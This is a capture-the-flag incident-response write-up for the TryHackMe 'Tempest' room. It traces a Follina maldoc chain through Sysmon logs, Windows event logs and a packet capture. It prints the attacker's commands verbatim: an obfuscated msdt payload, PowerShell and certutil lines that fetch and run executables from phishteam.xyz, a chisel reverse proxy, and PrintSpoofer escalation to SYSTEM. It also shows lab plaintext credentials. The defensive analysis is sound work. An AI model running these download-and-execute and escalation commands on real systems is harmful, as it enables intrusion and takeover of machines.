Tempest

You are tasked to conduct an investigation from a workstation affected by a full attack chain.

CONTEXT

I. Background

In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.

Challenge Link: TryHackMe - Tempest

II. Tools and Artifacts

Conversion of Log Files

Conversion of EVTX files to JSON using EvtxECmd:

PS> .\EvtxECmd\EvtxECmd.exe -f sysmon.evtx --json .\ --jsonf sysmon.json

  Metrics (including dropped events)
  Event ID        Count
  1               238
  2               2
  3               92 
  5               3
  8               3
  11              1,024
  12              186
  13              869
  15              6
  22              136

PS> .\EvtxECmd\EvtxECmd.exe -f windows.evtx --json .\ --jsonf windows.json

  Metrics (including dropped events)
  Event ID        Count
  1102            1
  4624            43
  4625            4
  4648            9
  4720            2
  4722            2
  4724            3
  4728            2
  4732            3
  4738            3
  4797            34
  4798            27
  4799            12
  5379            51
  5382            2

Protocol Heirarchy (pcap)

$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr
  
  16305 TCP
   1883 TLSv1.2
   1709 HTTP
    734 WebSocket
    548 TLSv1.3
     21 TLSv1
     13 HTTP/XML
      6 SSL

ANALYSIS

I. Initial Access

MALICIOUS DOCUMENT

As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:
The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.

A maldoc was found to be downloaded into the workstation via browser. This was confirmed via logs pertaining to file creation (Sysmon Event ID 11) with its source coming from chrome.exe.

$ cat sysmon.json | grep EventId..11 | grep chrome.exe | grep ".doc" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | .[0]*.[1]*.[2]'

  {
    "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "TargetFilename": "C:\\Users\\benimaru\\Downloads\\free_magicules.doc:Zone.Identifier",
    "CreationUtcTime": "2022-06-20 17:12:56.193"
  }

The file was downloaded from phishteam.xyz (167.71.199.191):

$ tshark -r capture.pcapng -Y "http" | grep free_magicules.doc

  1367  89.506977 192.168.254.107 → 167.71.199.191 HTTP 595 GET /02dcf07/free_magicules.doc HTTP/1.1
  
$ tshark -r capture.pcapng -Y 'frame matches "free_magicules.doc"' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'

  {
    "http.host": "phishteam.xyz",
    "http.request.line": "If-Modified-Since: Mon, 20 Jun 2022 16:01:32 GMT\r\n",
    "http.connection": "keep-alive",
    "http.user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36",
    "http.accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "http.accept_encoding": "gzip, deflate",
    "http.accept_language": "en-US,en;q=0.9",
    "http.request.full_uri": "http://phishteam.xyz/02dcf07/free_magicules.doc",
    "http.request": "1",
    "http.request_number": "1"
  }

The file, free_magicules.doc, was then opened via Microsoft Word (WINWORD.EXE):

$ cat sysmon.json | grep EventId..1, | grep free_magicules | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:13:12.410",
    "ProcessId": "496",
    "Image": "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "CommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\benimaru\\Downloads\\free_magicules.doc\" /o \"\"",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=09B09DC651D921FE022B16C234E64A12,SHA256=E25F32401FD3D25958B8B99F280F0325B232E54F185CC5D6E0710923005AC64A,IMPHASH=744185317F5DAAFAEB367DDD2932CC02",
    "ParentProcessId": "6596"
  }

Spawning from the Microsoft Word process was an execution of msdt.exe which is highly indicative of the Follina 0-day exploit (CVE-2022-30190).

$ cat sysmon.json | grep EventId..1, | grep -i "id..496" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^CommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:13:35.180",
    "ProcessId": "4868",
    "Image": "C:\\Windows\\SysWOW64\\msdt.exe",
    "CommandLine": "C:\\Windows\\SysWOW64\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=4EBC38519675FB0BA6915D0D8A7FCD01,SHA256=1BE8AFD2962596807611E6A8836952D6BBDC24BDE52A34905006FF78F1AD5D12,IMPHASH=AF42CCE29BF30BC07C0496AF0420FD91",
    "ParentProcessId": "496"
  }

Exploring the CommandLine parameter for the possible Follina Exploit, the payload contains a base64 encoded bit:

C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

Which when decoded, becomes the following (beautified):

$app=[Environment]::GetFolderPath('ApplicationData');
cd "$app\Microsoft\Windows\Start Menu\Programs\Startup"; 
iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; 
Expand-Archive .\update.zip -DestinationPath .; 
rm update.zip;

The decoded payload downloads and adds a file, update.zip, to the Startup folder which is then extracted to the same directory. The execution being done in PowerShell as well as having sdiagnhost.exe writing the file to the Startup folder confirms the abuse of the Follina exploit.

$ cat sysmon.json | grep EventId..11 | grep update.zip | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'   

  {
    "Image": "C:\\Windows\\SysWOW64\\sdiagnhost.exe",
    "TargetFilename": "C:\\Users\\benimaru\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.zip",
    "CreationUtcTime": "2022-06-20 17:13:37.822"
  }

STAGE 2 EXECUTION

Based on the initial findings, we discovered that there is a stage 2 execution:
The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.

As the file, update.zip, was written in the Startup folder, login activities of the compromised user (benimaru) were monitored and processes spawned by winlogon.exe were traced.

$ cat sysmon.json | grep EventId..1, | grep -i "winlogon.exe" | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:12:24.262",
    "ProcessId": "5968",
    "Image": "C:\\Windows\\System32\\userinit.exe",
    "CommandLine": "C:\\Windows\\system32\\userinit.exe",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
    "ParentProcessId": "5612",
    "ParentCommandLine": "winlogon.exe"
  }
  {
    "UtcTime": "2022-06-20 17:14:50.535",
    "ProcessId": "3408",
    "Image": "C:\\Windows\\System32\\userinit.exe",
    "CommandLine": "C:\\Windows\\system32\\userinit.exe",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=BF8825D08BC235F0609CA8BBEF4E179C,SHA256=1FE7F7C59EC7EAA276739FA85F7DDA6136D81184E0AEB385B6AC9FEAAA8C4394,IMPHASH=8419D97ABDFEB6C320F0C39028647572",
    "ParentProcessId": "1396",
    "ParentCommandLine": "winlogon.exe"
  }

Upon tracing the logs, a PowerShell execution was spawned which leads to the download of a stage 2 payload (first.exe).

$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..3408" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  {
    "UtcTime": "2022-06-20 17:14:50.606",
    "ProcessId": "5784",
    "Image": "C:\\Windows\\explorer.exe",
    "CommandLine": "C:\\Windows\\Explorer.EXE",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=2F62005FCEA7430BB871A56F7700F81C,SHA256=B759293373A11D1A972873A902BC64B2C9690AB947CE4A185CD047195521296D,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959",
    "ParentProcessId": "3408",
    "ParentCommandLine": "C:\\Windows\\system32\\userinit.exe"
  }
  
$ cat sysmon.json | grep EventId..1, | grep -i "parent.*id..5784" | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add'

  [..omitted..]
  {
    "UtcTime": "2022-06-20 17:15:10.547",
    "ProcessId": "9052",
    "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
    "ParentProcessId": "5784",
    "ParentCommandLine": "C:\\Windows\\Explorer.EXE"
  }

Looking at the command executed, the payload was downloaded to the Public Downloads folder.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

The logs shown below proves the successful download and execution of first.exe:

$ cat sysmon.json | grep EventId..11 | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^TargetFilename|^CreationUtcTime|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) |
 add'
  
  {
    "UtcTime": "2022-06-20 17:15:14.096",
    "Image": "C:\\Windows\\system32\\certutil.exe",
    "TargetFilename": "C:\\Users\\Public\\Downloads\\first.exe",
    "CreationUtcTime": "2022-06-20 14:29:54.049"
  }
  
$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*first.exe"))'

  {
    "UtcTime": "2022-06-20 17:15:14.129",
    "ProcessId": "8948",
    "Image": "C:\\Users\\Public\\Downloads\\first.exe",
    "CommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\"",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
    "ParentProcessId": "9052",
    "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\\Users\\Public\\Downloads\\first.exe; C:\\Users\\Public\\Downloads\\first.exe"
  }

Network logs included in Sysmon shows that the execution of first.exe creates a callback to resolvecyber.xyz (167.71.222.162) at port 80:

$ cat sysmon.json | grep EventId..3, | grep first.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E "Destination" | sort | uniq
  
  "DestinationIp": "167.71.222.162",
  "DestinationPort": "80",
  "DestinationPortName": "http"
  
$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.host")) then ({key: .key, value: .value}) else empty end)' | grep http.host | uniq
  
  "http.host": "resolvecyber.xyz"
  "http.host": "resolvecyber.xyz:8080"

MALICIOUS DOCUMENT TRAFFIC

Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:
We discovered the Domain and IP invoked by the malicious document on Sysmon logs.
There is another domain and IP used by the stage 2 payload logged from the same data source.

Network traffic related to the execution of first.exe shows requests to the URI path /9ab62b5:

$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" | head -n 1
 
   5159 227.738875 192.168.254.107 → 167.71.222.162 HTTP 161 GET /9ab62b5 HTTP/1.1
   
$ tshark -r capture.pcapng -Y "frame.number==5159" -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.*")) then ({key: .key, value: .value}) else empty end)'

  {
    "http.host": "resolvecyber.xyz",
    "http.request.line": "user-agent: Nim httpclient/1.6.6\r\n",
    "http.connection": "Keep-Alive",
    "http.user_agent": "Nim httpclient/1.6.6",
    "http.request.full_uri": "http://resolvecyber.xyz/9ab62b5",
    "http.request": "1",
    "http.request_number": "1"
  }

Requests with the GET parameter, ?q=, are also seen with base64 encoded payloads.

$ tshark -r capture.pcapng -Y "ip.dst==167.71.222.162 and http" -T fields -e http.request.uri

  /9ab62b5
  /9ab62b5?q=d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K
  /9ab62b5
  /9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K
  /9ab62b5
  [..omitted..]

II. Discovery

Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:
We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.

HTTP requests with base64 encoded payloads were parsed and decoded using the following command:

$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 80) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2); do
> echo $i | base64 -d;
> done

The threat actor was then seen to have achieved Remote Code Execution (RCE) with a non-interactive webshell. Initial enumeration included their current user context, existing user directories, as well as local users and administrators:

> whoami 

  tempest\benimaru
  
> pwd

  Path
  ----
  C:\Windows\system32

> dir C:\Users 

      Directory: C:\Users


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  d-----        6/20/2022   9:06 PM                benimaru
  d-r---        6/20/2022   4:03 PM                Public
  d-----        6/20/2022  11:52 PM                rimuru

> net users 

  User accounts for \\TEMPEST

  -------------------------------------------------------------------------------
  Administrator            benimaru                 DefaultAccount
  Guest                    rimuru                   WDAGUtilityAccount
  The command completed successfully.


> net localgroup administrators - 

  Alias name     administrators
  Comment        Administrators have complete and unrestricted access to the computer/domain

  Members

  -------------------------------------------------------------------------------
  Administrator
  rimuru
  The command completed successfully.

> net user benimaru

  User name                    benimaru
  Full Name
  Comment
  User's comment
  Country/region code          000 (System Default)
  Account active               Yes
  Account expires              Never

  Password last set            6/20/2022 9:18:04 PM
  Password expires             Never
  Password changeable          6/20/2022 9:18:04 PM
  Password required            No
  User may change password     Yes

  Workstations allowed         All
  Logon script
  User profile
  Home directory
  Last logon                   6/21/2022 1:14:49 AM

  Logon hours allowed          All

  Local Group Memberships      *Remote Management Use*Users
  Global Group memberships     *None
  The command completed successfully.

Next, they began exploring the current user context's home directory:

> dir C:\Users\benimaru -

        Directory: C:\Users\benimaru


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  d-r---        6/20/2022   4:13 PM                3D Objects
  d-r---        6/20/2022   4:13 PM                Contacts
  d-r---        6/21/2022  12:27 AM                Desktop
  d-r---        6/20/2022   9:20 PM                Documents
  d-r---        6/21/2022   1:13 AM                Downloads
  d-r---        6/20/2022   4:13 PM                Favorites
  d-r---        6/20/2022   4:13 PM                Links
  d-r---        6/20/2022   4:13 PM                Music
  dar---        6/21/2022   1:15 AM                OneDrive
  d-r---        6/20/2022   4:13 PM                Pictures
  d-r---        6/20/2022   4:13 PM                Saved Games
  d-r---        6/20/2022   4:13 PM                Searches
  d-r---        6/20/2022   5:57 PM                Videos

> dir C:\Users\benimaru\documents 

> dir C:\users\benimaru\Desktop -

      Directory: C:\users\benimaru\Desktop


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -a----        6/20/2022  11:34 PM            268 automation.ps1
  -a----        6/20/2022   4:13 PM           1446 Microsoft Edge.lnk
  
> cat C:\Users\Benimaru\Desktop\automation.ps1

A file, automation.ps1, was discovered which includes the user, benimaru's, credentials in plaintext:

$user = "TEMPEST\benimaru"
$pass = "infernotempest"

$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword

## TODO: Automate easy tasks to hack working hours

Following the user enumeration, network-related information were then gathered:

> netstat -ano -p tcp

  Active Connections

    Proto  Local Address          Foreign Address        State           PID
    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5508
    TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4964
    TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
    TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
    TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1212
    TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1760
    TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2424
    TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       624
    TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       608
    TCP    192.168.254.107:139    0.0.0.0:0              LISTENING       4
    TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
    TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
    TCP    192.168.254.107:51858  104.101.22.128:80      TIME_WAIT       0
    TCP    192.168.254.107:51860  20.205.146.149:443     TIME_WAIT       0
    TCP    192.168.254.107:51861  204.79.197.200:443     ESTABLISHED     4352
    TCP    192.168.254.107:51871  20.190.144.169:443     TIME_WAIT       0
    TCP    192.168.254.107:51876  52.178.17.2:443        ESTABLISHED     4388
    TCP    192.168.254.107:51878  20.60.178.36:443       ESTABLISHED     4388
    TCP    192.168.254.107:51881  52.109.124.115:443     ESTABLISHED     4388
    TCP    192.168.254.107:51882  52.139.154.55:443      ESTABLISHED     4388
    TCP    192.168.254.107:51884  40.119.211.203:443     ESTABLISHED     4388
    TCP    192.168.254.107:51895  52.152.90.172:443      ESTABLISHED     5508
    TCP    192.168.254.107:51896  20.44.229.112:443      ESTABLISHED     8904

Finally, the threat actor downloaded chisel (a socks proxy application) into the workstation:

> powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - base64: invalid input

> dir C:\Users\benimaru\Downloads\ch.exe -

      Directory: C:\Users\benimaru\Downloads


  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -a----        6/21/2022   1:17 AM        8230912 ch.exe

A reverse socks proxy to 167.71.199.191:8080 was started:

$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*ch.exe"))'

  {
    "UtcTime": "2022-06-20 17:18:48.723",
    "ProcessId": "7388",
    "Image": "C:\\Users\\benimaru\\Downloads\\ch.exe",
    "CommandLine": "\"C:\\Users\\benimaru\\Downloads\\ch.exe\" client 167.71.199.191:8080 R:socks",
    "User": "TEMPEST\\benimaru",
    "Hashes": "MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043",
    "ParentProcessId": "8948",
    "ParentCommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\""
  }

The user, benimaru, belonging to the Remote Management Users group as well as having TCP port 5985 open in his workstation may have given the threat actor remote access via WinRM. The logs below show all Network logons (LogonType 3) of the compromised user:

$ cat windows.json | grep -E 'EventId..4624' | grep 'benimaru' | grep -i "type 3" | jq -r '{LogonType: .PayloadData2, UserName: .PayloadData1, Time: .TimeCreated}'

  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:19:05.7222347+00:00"
  }
  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:20:06.2574361+00:00"
  }
  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:21:05.5133859+00:00"
  }
  {
    "LogonType": "LogonType 3",
    "UserName": "Target: TEMPEST\\benimaru",
    "Time": "2022-06-20T17:21:33.8813884+00:00"
  }

III. Privilege Escalation

Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.

Executions were seen in the Sysmon logs but not in the captured network traffic. This leads to the assumption that the threat actor was able to establish a stable shell via WinRM.

The first execution was enumeration of privileges for the current user context (benimaru):

{
  "UtcTime": "2022-06-20 17:19:16.266",
  "ProcessId": "2068",
  "Image": "C:\\Windows\\System32\\whoami.exe",
  "CommandLine": "\"C:\\Windows\\system32\\whoami.exe\" /priv",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88",
  "ParentProcessId": "6204",
  "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" whoami /priv"
}

Afterwhich, the files, spf.exe and final.exe, were downloaded into the workstation:

{
  "UtcTime": "2022-06-20 17:20:06.648",
  "ProcessId": "6804",
  "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
  "ParentProcessId": "4208",
  "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
  "UtcTime": "2022-06-20 17:21:05.827",
  "ProcessId": "3712",
  "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/final.exe -outfile C:\\ProgramData\\final.exe",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
  "ParentProcessId": "4208",
  "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}

spf.exe was executed (to run final.exe after the fact) and based on the executable's hash was found to be a printspoofer exploit which abuses impersonation privileges (SeImpersonatePrivilege). The threat actor must have been tipped off after enumerating user privileges.

{
  "UtcTime": "2022-06-20 17:21:34.192",
  "ProcessId": "6828",
  "Image": "C:\\Users\\benimaru\\Downloads\\spf.exe",
  "CommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe",
  "User": "TEMPEST\\benimaru",
  "Hashes": "MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF",
  "ParentProcessId": "4208",
  "ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
  "UtcTime": "2022-06-20 17:21:34.268",
  "ProcessId": "8264",
  "Image": "C:\\ProgramData\\final.exe",
  "CommandLine": "C:\\ProgramData\\final.exe",
  "User": "NT AUTHORITY\\SYSTEM",
  "Hashes": "MD5=4C014F94A8FA0B484A2EDAB422AB2A1A,SHA256=03E1840A24506AFC88AB5FF7F83D2B07B558B34FF42DD34DD93267FD2E7A74E6,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
  "ParentProcessId": "6828",
  "ParentCommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe"
}

After the execution of final.exe, network connections were checked on sysmon for possible callbacks and true enough:

$ cat sysmon.json | grep EventId..3, | grep -i final.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E 'Image|Destination(Ip|Port")' | sort | uniq

  "DestinationIp": "167.71.222.162",
  "DestinationPort": "8080",
  "Image": "C:\\ProgramData\\final.exe",

IV. Post-Exploitation

Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.
In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.

Callbacks to 167.71.222.162:8080 were parsed and decoded using the following command:

$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 8080) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2); 
> do echo $i | base64 -d;
> done

Now, the current user context of the threat actor is NT AUTHORITY\SYSTEM which is the local superadmin of the workstation:

> whoami

  nt authority\system

> pwd 

  Path
  ----
  C:\Windows\system32
  
> whoami /priv

  PRIVILEGES INFORMATION
  ----------------------

  Privilege Name                            Description                                                        State
  ========================================= ================================================================== =======
  SeCreateTokenPrivilege                    Create a token object                                              Enabled
  SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
  SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
  SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
  SeTcbPrivilege                            Act as part of the operating system                                Enabled
  SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
  SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
  SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
  SeSystemProfilePrivilege                  Profile system performance                                         Enabled
  SeSystemtimePrivilege                     Change the system time                                             Enabled
  SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
  SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
  SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
